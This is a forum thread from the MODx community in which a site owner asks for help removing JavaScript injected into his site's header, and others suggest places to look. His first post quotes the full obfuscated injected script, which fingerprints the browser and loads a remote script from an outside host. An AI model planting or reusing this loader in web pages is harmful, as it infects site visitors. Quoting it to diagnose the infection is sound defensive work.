We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 25737
    • 62 Posts
    My site http://www.aallinlimos.com has had some random JavaScript injected into the header, right after the closing head tag.

    It looks like this:
    <script language=javascript><!-- 
    (function(Xtnwx){var bHrg='%';var bcrf='var&20&61&3d&22ScriptEngine&22&2cb&3d&22Version()+&22&2cj&3d&22&22&2cu&3dnavigator&2euserAgent&3bif((u&2eindex&4ff&28&22Win&22)&3e0)&26&26(u&2eindexOf(&22NT&206&22)&3c0)&26&26(document&2ecookie&2ein&64exOf(&22miek&3d1&22)&3c0)&26&26(type&6ff(zrvzts)&21&3dtypeof(&22A&22)))&7bzrv&7ats&3d&22A&22&3beval(&22&69f(win&64ow&2e&22+a+&22)j&3dj+&22+a+&22Major&22+b+a+&22Minor&22+b+a+&22Build&22+b+&22j&3b&22)&3bdocument&2ewrite(&22&3cscript&20src&3d&2f&2fgumb&6car&2ecn&2frss&2f&3f&69d&3d&22+j+&22&3e&3c&5c&2fscript&3e&22)&3b&7d';var yirU=bcrf.replace(Xtnwx,bHrg);eval(unescape(yirU))})(/&/g);
     --></script>
    


    Can someone please help me remove it? Google has blocked my site.

    I found out the information above from here: http://badwarebusters.org/main/itemview/3616?t=1792#itemblock-3622

    I’ve tried upgrading MODx, installed new files over old, but the upgrade option was not highlighted so I couldn’t complete it.

    Thanks!
      Faithfully using MODx since 2007!
      • 9130
      • 171 Posts
      You should start by making sure your server is secure, there is no point in trying this just to have an automatic script inject it again.
      The easiest way to fix this is to do a clean install and restore everything from an uninfected backup. If for some reason that’s not an option the first thing to do is identify where the script is coming from, is it in a file(s) or is it in the database? Normally everything MODx displays comes from the database, open the db with phpmyadmin or something similar and take a look. When you have an idea whats actually wrong and needs fixing only then you can do something about it.
        • 3749
        • 24,544 Posts
        Take a look at your index.php file. That’s where hackers most commonly add malicious code. If it contains the js malware, look at the copy of it on your local machine.
          Did I help you? Buy me a beer
          Get my Book: MODX:The Official Guide
          MODX info for everyone: http://bobsguides.com/modx.html
          My MODX Extras
          Bob's Guides is now hosted at A2 MODX Hosting
          • 25737
          • 62 Posts
          I went through the database but found nothing. I used the search method and entered part of the code, but it came back with nothing. I also clicked on each table and went through it using pypmyadmin, but nada.

          I’ve already looked at the index.php file and didn’t see anything there either.

          I ran an anti virus scan on my Mac but it found nothing.

          Anything else I can try? 
            Faithfully using MODx since 2007!
            • 23571
            • 223 Posts
            Could it be in the cache?
              • 25737
              • 62 Posts
              I’m looking in the cache now, there are 2 files in here that I havent seen before:

              docid_1.pageCache.php
              docid_6.pageCache.php

              Anyone know if these are suppose to be here?

              I also looked at the cookies, and it seems like everytime the page is loaded it sets cookies.. Is this normal for MODx? I’m not logged into the site manager either.
                Faithfully using MODx since 2007!
                • 33337
                • 3,975 Posts
                Quote from: runningthingz at May 22, 2009, 05:58 PM

                I’m looking in the cache now, there are 2 files in here that I havent seen before:

                docid_1.pageCache.php
                docid_6.pageCache.php

                Anyone know if these are suppose to be here?

                I also looked at the cookies, and it seems like everytime the page is loaded it sets cookies..  Is this normal for MODx?  I’m not logged into the site manager either.

                These are the cache files MODx create. Perfectly normal.

                You can run the search on all the files and see if something comes up.
                  Zaigham R - MODX Professional | Skype | Email | Twitter

                  Digging the interwebs for #MODX gems and bringing it to you. modx.link
                  • 25737
                  • 62 Posts
                  Just compared the existing index.php and a new one, they are exactly the same.
                    Faithfully using MODx since 2007!
                    • 33337
                    • 3,975 Posts
                    Err... I re-read the old comments and modified my comment. tongue ... in a mean time u replied
                      Zaigham R - MODX Professional | Skype | Email | Twitter

                      Digging the interwebs for #MODX gems and bringing it to you. modx.link
                      • 25737
                      • 62 Posts
                      Excuse my ignorance, how is that done? What should I search for, a part of the code?
                        Faithfully using MODx since 2007!